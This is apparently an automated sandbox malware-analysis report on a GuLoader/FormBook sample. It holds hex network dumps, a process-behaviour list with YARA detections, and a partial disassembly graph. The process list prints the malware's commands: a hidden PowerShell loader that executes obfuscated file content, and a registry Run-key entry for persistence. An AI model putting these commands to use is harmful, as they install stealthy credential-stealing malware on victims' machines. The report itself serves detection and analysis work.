                                                                      Data Ascii: m&LV#P}i*:FY?|H:teV,.'gJCWLgiiJruk[-&jj;1j!d&$KC!!3816jG_kwM|;+@p|5^Py/;/%{<)eI]:@u9#ipK8v
                                                                      2024-04-25 17:25:25 UTC16384INData Raw: 2f d0 0d 0a 72 f9 ca 5b 31 1e 6d e8 f4 fb e2 c2 78 91 a1 91 e8 51 bd de c4 3d ec 14 22 92 56 7e 14 ee 09 e9 d4 62 85 aa 7f ed b8 26 56 82 ce 5c e0 22 47 60 74 14 50 2c 7e 05 d0 b8 e6 f3 7e c2 a3 16 48 d3 f9 d4 ed aa d1 9b e8 35 1f b2 b7 1a ed be 53 b3 ad 9f b5 53 ca 4f e9 20 70 00 3c 6e d0 93 62 52 f4 43 ee 23 d8 83 1e 1e 69 5e 74 52 07 12 f0 e5 ab bd d2 b7 b7 ea 4d fc d0 0f 99 1e 79 df fb ae dc 8f cd 14 b2 72 33 16 ad e3 96 15 ce 2e b2 d6 fd 4c 2b b7 c5 30 11 e8 24 17 aa 51 e0 6f 43 26 74 71 d8 9e a8 a4 85 96 72 62 b0 01 ca 82 99 ba 98 05 dd 60 8f 97 d8 03 db c8 f4 b5 15 62 b5 e6 d5 8e 2c 8a 11 6e 8b fd c4 98 93 15 a6 31 ba 7f 18 95 87 67 71 7f 68 e1 f0 ed fa 22 68 9a 7f 7c 84 a3 e3 ea d5 25 6c bf b8 00 4c 2a 58 54 d6 14 77 c8 87 fb 30 cf 2a 35 49 49 a7
                                                                      Data Ascii: /r[1mxQ="V~b&V\"G`tP,~~H5SSO p<nbRC#i^tRMyr3.L+0$QoC&tqrb`b,n1gqh"h|%lL*XTw0*5II
                                                                      2024-04-25 17:25:26 UTC16384INData Raw: c9 16 b2 5e 57 0f a0 4f 60 aa 60 0d 03 3a 37 c7 72 96 bd c5 65 ca a5 aa 97 d3 e5 cb 14 34 c1 6d 2b 71 e6 e0 99 10 a1 ff d5 d1 8d f3 2b d6 0b 27 94 1a 1b db 79 d9 7d 6f 34 d8 90 4c 32 48 a7 31 c9 bf 5e 2a a5 6c f7 da b6 3f a3 31 c7 5f ce fd 2a 7f 5c 07 75 98 59 a7 c1 16 6d 12 91 d6 a1 ec 20 7d a5 83 6f 1b ef 55 04 b4 bf 93 63 a9 d2 b9 e0 1e 40 b7 4d 43 98 29 44 fe ae 19 ae 6f e5 bd 0f 79 91 ab 30 8e ff 23 a0 f1 da f6 76 c2 f2 49 66 03 53 76 74 96 39 8e 99 f8 94 5c b5 94 72 3f 9e ee ba 0a 29 70 1b 45 06 0b 56 8b 86 f4 1a 51 f4 dc f2 97 2e a0 c4 2d 92 9a ff ef b5 5a e0 cc 2c 42 72 cb b8 c8 ef e2 06 12 64 ca 9b 09 91 40 f5 e9 ab a1 c2 5a 3b 74 51 d7 2c 81 4d d9 76 1e 36 16 be f2 9f 52 7f cb e7 68 c8 b9 08 c7 ca f6 35 5c d5 7d ab e6 93 0a a2 ce 68 9c ba 61 63
                                                                      Data Ascii: ^WO``:7re4m+q+'y}o4L2H1^*l?1_*\uYm }oUc@MC)Doy0#vIfSvt9\r?)pEVQ.-Z,Brd@Z;tQ,Mv6Rh5\}hac
                                                                      2024-04-25 17:25:26 UTC16384INData Raw: 1d e2 c0 f5 0e d9 0b 2b e0 9a a0 e2 8f c4 9f fa 71 fe d2 d7 cb 47 aa a0 5a 4c 15 35 cc 77 23 1c 60 0f c7 cf a2 fe 1a 6d 55 fd ad 79 5f 39 34 12 24 47 e3 95 ed b6 58 16 6c 3d 92 ba 43 47 43 b9 9e a2 16 de ff e3 a9 dd 60 23 42 b4 1e 52 d3 a4 31 cf 7f 29 d8 7f 88 31 bb 78 b2 e7 08 5d 91 5b 9c df 67 61 2e 55 71 b5 67 c1 9b 42 15 6e 0d 4d ad 5e 22 fa 9c a0 ca ab 6b a6 47 14 85 5e a0 2b 21 f0 d9 bd 4e 60 fa 36 d5 cf 0e 77 3d 7f e3 c8 13 68 88 d0 08 cf 6c e1 98 f9 62 be c7 3e 6d af b0 c9 7b a0 b3 13 0c d3 e3 1c ba 92 15 33 c1 22 32 8e ce ba e1 26 02 49 c5 87 0d 90 eb 42 aa 7d f3 07 e4 7a bd 35 34 db 37 bf 58 2c 16 b5 f4 70 63 7c b3 f6 bd c2 ea 8c a4 76 d2 72 47 91 db b6 e4 f5 d2 62 56 35 75 8f 2f 15 19 30 93 bb b6 6e 33 75 07 53 22 c4 31 e7 f3 f1 71 28 70 46 35
                                                                      Data Ascii: +qGZL5w#`mUy_94$GXl=CGC`#BR1)1x][ga.UqgBnM^"kG^+!N`6w=hlb>m{3"2&IB}z547X,pc|vrGbV5u/0n3uS"1q(pF5
                                                                      2024-04-25 17:25:26 UTC16384INData Raw: ff 15 f6 08 8f a2 b4 12 2e fb 3c 57 fd c2 d7 b2 94 8c 4b 41 a4 09 2f 0a 79 0a 33 d3 91 f6 54 ab 79 fa fe 4d 53 1e 97 70 07 da e4 0d bd d3 2d 89 3d b6 84 ef 24 2b a4 73 0d 82 b7 03 3d 3e 25 60 bd cb fc 9a f9 cb a8 47 82 b2 62 d3 f0 9c df f0 3b fc f7 bc 92 6d 90 7d 5e fd eb a4 17 15 c7 fd 3b 5c c5 24 7e f0 da 1f fd 3a 3e fc f2 e4 82 4c 4f 03 d3 96 c6 f6 65 b7 f9 08 c9 f8 f2 51 4a 59 2a 6b 59 45 41 60 eb e6 e5 9e 54 64 2f 18 cf 4e 43 64 12 ff cd 8d e1 db 97 d2 40 ec a3 ea 49 dd cc 8f 7d f8 04 51 c6 58 72 b8 07 e9 9e 6c 6f ed 2a f8 a4 b9 9e 87 32 78 ed 1b 6f 7e a0 ca 14 16 f2 5e 27 6a 02 ec d3 77 2d e6 87 87 e9 08 ae 4b 2b dc 6a 36 4a 7f fc 51 5f f6 c9 62 dc 61 41 a1 f9 23 6c e4 9c 75 05 70 72 13 7f 60 c0 4c fe ff 81 6d 87 b4 4d a2 35 53 f6 a0 73 ee fb bc 64
                                                                      Data Ascii: .<WKA/y3TyMSp-=$+s=>%`Gb;m}^;\$~:>LOeQJY*kYEA`Td/NCd@I}QXrlo*2xo~^'jw-K+j6JQ_baA#lupr`LmM5Ssd


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:19:24:14
                                                                      Start date:25/04/2024
                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"
                                                                      Imagebase:0x400000
                                                                      File size:562'306 bytes
                                                                      MD5 hash:4621FEA50E1982E6F753EFE7D1BE2B35
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:19:24:15
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
                                                                      Imagebase:0x2f0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2075682584.0000000009E59000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:19:24:15
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff620390000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:19:24:16
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                                      Imagebase:0xd70000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:8
                                                                      Start time:19:25:08
                                                                      Start date:25/04/2024
                                                                      Path:C:\Users\user\AppData\Local\Temp\Overfondle.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Overfondle.exe"
                                                                      Imagebase:0x400000
                                                                      File size:562'306 bytes
                                                                      MD5 hash:4621FEA50E1982E6F753EFE7D1BE2B35
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 50%, ReversingLabs
                                                                      • Detection: 61%, Virustotal, Browse
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:19:25:22
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
                                                                      Imagebase:0x7ff620390000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:19:25:22
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff620390000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:19:25:22
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
                                                                      Imagebase:0xf60000
                                                                      File size:59'392 bytes
                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:19:25:27
                                                                      Start date:25/04/2024
                                                                      Path:C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe"
                                                                      Imagebase:0xd10000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.2615828558.0000000003550000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:14
                                                                      Start time:19:25:29
                                                                      Start date:25/04/2024
                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\cmd.exe"
                                                                      Imagebase:0xd70000
                                                                      File size:236'544 bytes
                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:15
                                                                      Start time:19:25:42
                                                                      Start date:25/04/2024
                                                                      Path:C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe"
                                                                      Imagebase:0xd10000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:17
                                                                      Start time:19:25:54
                                                                      Start date:25/04/2024
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff613480000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:24.3%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:20.8%
                                                                        Total number of Nodes:1402
                                                                        Total number of Limit Nodes:38
                                                                        execution_graph 4012 401ec5 4013 402c17 17 API calls 4012->4013 4014 401ecb 4013->4014 4015 402c17 17 API calls 4014->4015 4016 401ed7 4015->4016 4017 401ee3 ShowWindow 4016->4017 4018 401eee EnableWindow 4016->4018 4019 402ac5 4017->4019 4018->4019 3157 401746 3158 402c39 17 API calls 3157->3158 3159 40174d 3158->3159 3163 405e19 3159->3163 3161 401754 3162 405e19 2 API calls 3161->3162 3162->3161 3164 405e24 GetTickCount GetTempFileNameA 3163->3164 3165 405e51 3164->3165 3166 405e55 3164->3166 3165->3164 3165->3166 3166->3161 4020 401947 4021 402c39 17 API calls 4020->4021 4022 40194e lstrlenA 4021->4022 4023 402628 4022->4023 4027 401fcb 4028 402c39 17 API calls 4027->4028 4029 401fd2 4028->4029 4030 4065ce 2 API calls 4029->4030 4031 401fd8 4030->4031 4033 401fea 4031->4033 4034 4061b5 wsprintfA 4031->4034 4034->4033 4035 6eac19a3 GetCommandLineA lstrcpynA 4036 6eac19f7 4035->4036 4037 6eac1a17 CharNextA 4036->4037 4038 6eac1a0e CharNextA 4036->4038 4039 6eac1a1c CreateProcessA 4037->4039 4038->4036 4041 6eac1a46 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4039->4041 4042 6eac1a77 ExitProcess 4039->4042 4043 4014d6 4044 402c17 17 API calls 4043->4044 4045 4014dc Sleep 4044->4045 4047 402ac5 4045->4047 3860 401759 3861 402c39 17 API calls 3860->3861 3862 401760 3861->3862 3863 401786 3862->3863 3864 40177e 3862->3864 3900 406257 lstrcpynA 3863->3900 3899 406257 lstrcpynA 3864->3899 3867 401784 3871 406535 5 API calls 3867->3871 3868 401791 3869 405be9 3 API calls 3868->3869 3870 401797 lstrcatA 3869->3870 3870->3867 3887 4017a3 3871->3887 3872 4065ce 2 API calls 3872->3887 3873 405dc5 2 API calls 3873->3887 3875 4017ba CompareFileTime 3875->3887 3876 40187e 3878 405378 24 API calls 3876->3878 3877 401855 3879 405378 24 API calls 3877->3879 3888 40186a 3877->3888 3880 401888 3878->3880 3879->3888 3881 403143 31 API calls 3880->3881 3883 40189b 3881->3883 3882 406257 lstrcpynA 3882->3887 3884 4018af SetFileTime 3883->3884 3886 4018c1 FindCloseChangeNotification 3883->3886 3884->3886 3885 4062ea 17 API calls 3885->3887 3886->3888 3889 4018d2 3886->3889 3887->3872 3887->3873 3887->3875 3887->3876 3887->3877 3887->3882 3887->3885 3895 40596d MessageBoxIndirectA 3887->3895 3898 405dea GetFileAttributesA CreateFileA 3887->3898 3890 4018d7 3889->3890 3891 4018ea 3889->3891 3893 4062ea 17 API calls 3890->3893 3892 4062ea 17 API calls 3891->3892 3894 4018f2 3892->3894 3896 4018df lstrcatA 3893->3896 3897 40596d MessageBoxIndirectA 3894->3897 3895->3887 3896->3894 3897->3888 3898->3887 3899->3867 3900->3868 4048 401659 4049 402c39 17 API calls 4048->4049 4050 40165f 4049->4050 4051 4065ce 2 API calls 4050->4051 4052 401665 4051->4052 4053 401959 4054 402c17 17 API calls 4053->4054 4055 401960 4054->4055 4056 402c17 17 API calls 4055->4056 4057 40196d 4056->4057 4058 402c39 17 API calls 4057->4058 4059 401984 lstrlenA 4058->4059 4061 401994 4059->4061 4060 4019d4 4061->4060 4065 406257 lstrcpynA 4061->4065 4063 4019c4 4063->4060 4064 4019c9 lstrlenA 4063->4064 4064->4060 4065->4063 4066 404cd9 GetDlgItem GetDlgItem 4067 404d2f 7 API calls 4066->4067 4077 404f56 4066->4077 4068 404dd7 DeleteObject 4067->4068 4069 404dcb SendMessageA 4067->4069 4070 404de2 4068->4070 4069->4068 4071 404e19 4070->4071 4072 4062ea 17 API calls 4070->4072 4073 4042d4 18 API calls 4071->4073 4078 404dfb SendMessageA SendMessageA 4072->4078 4079 404e2d 4073->4079 4074 4050e4 4075 4050f6 4074->4075 4076 4050ee SendMessageA 4074->4076 4087 405108 ImageList_Destroy 4075->4087 4088 40510f 4075->4088 4098 40511f 4075->4098 4076->4075 4080 405038 4077->4080 4103 404fc5 4077->4103 4120 404c27 SendMessageA 4077->4120 4078->4070 4084 4042d4 18 API calls 4079->4084 4080->4074 4085 405091 SendMessageA 4080->4085 4109 404f49 4080->4109 4081 40502a SendMessageA 4081->4080 4082 40433b 8 API calls 4086 4052e5 4082->4086 4105 404e3e 4084->4105 4089 4050a6 SendMessageA 4085->4089 4085->4109 4087->4088 4091 405118 GlobalFree 4088->4091 4088->4098 4093 4050b9 4089->4093 4090 405299 4094 4052ab ShowWindow GetDlgItem ShowWindow 4090->4094 4090->4109 4091->4098 4092 404f18 GetWindowLongA SetWindowLongA 4095 404f31 4092->4095 4099 4050ca SendMessageA 4093->4099 4094->4109 4096 404f36 ShowWindow 4095->4096 4097 404f4e 4095->4097 4118 404309 SendMessageA 4096->4118 4119 404309 SendMessageA 4097->4119 4098->4090 4113 40515a 4098->4113 4125 404ca7 4098->4125 4099->4074 4100 404f13 4100->4092 4100->4095 4103->4080 4103->4081 4104 404e90 SendMessageA 4104->4105 4105->4092 4105->4100 4105->4104 4106 404ee2 SendMessageA 4105->4106 4107 404ece SendMessageA 4105->4107 4106->4105 4107->4105 4109->4082 4110 405264 4111 40526f InvalidateRect 4110->4111 4114 40527b 4110->4114 4111->4114 4112 405188 SendMessageA 4117 40519e 4112->4117 4113->4112 4113->4117 4114->4090 4134 404be2 4114->4134 4116 405212 SendMessageA SendMessageA 4116->4117 4117->4110 4117->4116 4118->4109 4119->4077 4121 404c86 SendMessageA 4120->4121 4122 404c4a GetMessagePos ScreenToClient SendMessageA 4120->4122 4124 404c7e 4121->4124 4123 404c83 4122->4123 4122->4124 4123->4121 4124->4103 4137 406257 lstrcpynA 4125->4137 4127 404cba 4138 4061b5 wsprintfA 4127->4138 4129 404cc4 4130 40140b 2 API calls 4129->4130 4131 404ccd 4130->4131 4139 406257 lstrcpynA 4131->4139 4133 404cd4 4133->4113 4140 404b1d 4134->4140 4136 404bf7 4136->4090 4137->4127 4138->4129 4139->4133 4141 404b33 4140->4141 4142 4062ea 17 API calls 4141->4142 4143 404b97 4142->4143 4144 4062ea 17 API calls 4143->4144 4145 404ba2 4144->4145 4146 4062ea 17 API calls 4145->4146 4147 404bb8 lstrlenA wsprintfA SetDlgItemTextA 4146->4147 4147->4136 3901 403dda 3902 403df2 3901->3902 3903 403f53 3901->3903 3902->3903 3904 403dfe 3902->3904 3905 403fa4 3903->3905 3906 403f64 GetDlgItem GetDlgItem 3903->3906 3908 403e09 SetWindowPos 3904->3908 3909 403e1c 3904->3909 3907 403ffe 3905->3907 3918 401389 2 API calls 3905->3918 3910 4042d4 18 API calls 3906->3910 3911 404320 SendMessageA 3907->3911 3928 403f4e 3907->3928 3908->3909 3912 403e25 ShowWindow 3909->3912 3913 403e67 3909->3913 3914 403f8e SetClassLongA 3910->3914 3931 404010 3911->3931 3919 403f40 3912->3919 3920 403e45 GetWindowLongA 3912->3920 3915 403e86 3913->3915 3916 403e6f DestroyWindow 3913->3916 3917 40140b 2 API calls 3914->3917 3921 403e8b SetWindowLongA 3915->3921 3922 403e9c 3915->3922 3973 40425d 3916->3973 3917->3905 3923 403fd6 3918->3923 3924 40433b 8 API calls 3919->3924 3920->3919 3925 403e5e ShowWindow 3920->3925 3921->3928 3922->3919 3926 403ea8 GetDlgItem 3922->3926 3923->3907 3927 403fda SendMessageA 3923->3927 3924->3928 3925->3913 3932 403ed6 3926->3932 3933 403eb9 SendMessageA IsWindowEnabled 3926->3933 3927->3928 3929 40140b 2 API calls 3929->3931 3930 40425f DestroyWindow EndDialog 3930->3973 3931->3928 3931->3929 3931->3930 3935 4062ea 17 API calls 3931->3935 3943 4042d4 18 API calls 3931->3943 3948 4042d4 18 API calls 3931->3948 3964 40419f DestroyWindow 3931->3964 3936 403ee3 3932->3936 3938 403f2a SendMessageA 3932->3938 3939 403ef6 3932->3939 3947 403edb 3932->3947 3933->3928 3933->3932 3934 40428e ShowWindow 3934->3928 3935->3931 3936->3938 3936->3947 3937 4042ad SendMessageA 3940 403f11 3937->3940 3938->3919 3941 403f13 3939->3941 3942 403efe 3939->3942 3940->3919 3944 40140b 2 API calls 3941->3944 3945 40140b 2 API calls 3942->3945 3943->3931 3946 403f1a 3944->3946 3945->3947 3946->3919 3946->3947 3947->3937 3949 40408b GetDlgItem 3948->3949 3950 4040a0 3949->3950 3951 4040a8 ShowWindow KiUserCallbackDispatcher 3949->3951 3950->3951 3974 4042f6 KiUserCallbackDispatcher 3951->3974 3953 4040d2 EnableWindow 3958 4040e6 3953->3958 3954 4040eb GetSystemMenu EnableMenuItem SendMessageA 3955 40411b SendMessageA 3954->3955 3954->3958 3955->3958 3957 403dbb 18 API calls 3957->3958 3958->3954 3958->3957 3975 404309 SendMessageA 3958->3975 3976 406257 lstrcpynA 3958->3976 3960 40414a lstrlenA 3961 4062ea 17 API calls 3960->3961 3962 40415b SetWindowTextA 3961->3962 3963 401389 2 API calls 3962->3963 3963->3931 3965 4041b9 CreateDialogParamA 3964->3965 3964->3973 3966 4041ec 3965->3966 3965->3973 3967 4042d4 18 API calls 3966->3967 3968 4041f7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3967->3968 3969 401389 2 API calls 3968->3969 3970 40423d 3969->3970 3970->3928 3971 404245 ShowWindow 3970->3971 3972 404320 SendMessageA 3971->3972 3972->3973 3973->3928 3973->3934 3974->3953 3975->3958 3976->3960 4148 401a5e 4149 402c17 17 API calls 4148->4149 4150 401a67 4149->4150 4151 402c17 17 API calls 4150->4151 4152 401a0e 4151->4152 4153 401563 4154 402a42 4153->4154 4157 4061b5 wsprintfA 4154->4157 4156 402a47 4157->4156 4158 401b63 4159 402c39 17 API calls 4158->4159 4160 401b6a 4159->4160 4161 402c17 17 API calls 4160->4161 4162 401b73 wsprintfA 4161->4162 4163 402ac5 4162->4163 4164 401d65 4165 401d78 GetDlgItem 4164->4165 4166 401d6b 4164->4166 4168 401d72 4165->4168 4167 402c17 17 API calls 4166->4167 4167->4168 4170 402c39 17 API calls 4168->4170 4172 401db9 GetClientRect LoadImageA SendMessageA 4168->4172 4170->4172 4171 401e1a 4173 401e1f DeleteObject 4171->4173 4174 401e26 4171->4174 4172->4171 4172->4174 4173->4174 4175 404766 4176 404792 4175->4176 4177 4047a3 4175->4177 4236 405951 GetDlgItemTextA 4176->4236 4179 4047af GetDlgItem 4177->4179 4180 40480e 4177->4180 4182 4047c3 4179->4182 4188 4062ea 17 API calls 4180->4188 4197 4048f2 4180->4197 4234 404a9c 4180->4234 4181 40479d 4183 406535 5 API calls 4181->4183 4184 4047d7 SetWindowTextA 4182->4184 4186 405c82 4 API calls 4182->4186 4183->4177 4187 4042d4 18 API calls 4184->4187 4192 4047cd 4186->4192 4193 4047f3 4187->4193 4194 404882 SHBrowseForFolderA 4188->4194 4189 404922 4195 405cd7 18 API calls 4189->4195 4190 40433b 8 API calls 4191 404ab0 4190->4191 4192->4184 4200 405be9 3 API calls 4192->4200 4196 4042d4 18 API calls 4193->4196 4194->4197 4198 40489a CoTaskMemFree 4194->4198 4199 404928 4195->4199 4201 404801 4196->4201 4197->4234 4238 405951 GetDlgItemTextA 4197->4238 4202 405be9 3 API calls 4198->4202 4239 406257 lstrcpynA 4199->4239 4200->4184 4237 404309 SendMessageA 4201->4237 4204 4048a7 4202->4204 4207 4048de SetDlgItemTextA 4204->4207 4211 4062ea 17 API calls 4204->4211 4206 404807 4209 406663 5 API calls 4206->4209 4207->4197 4208 40493f 4210 406663 5 API calls 4208->4210 4209->4180 4217 404946 4210->4217 4212 4048c6 lstrcmpiA 4211->4212 4212->4207 4215 4048d7 lstrcatA 4212->4215 4213 404982 4240 406257 lstrcpynA 4213->4240 4215->4207 4216 404989 4218 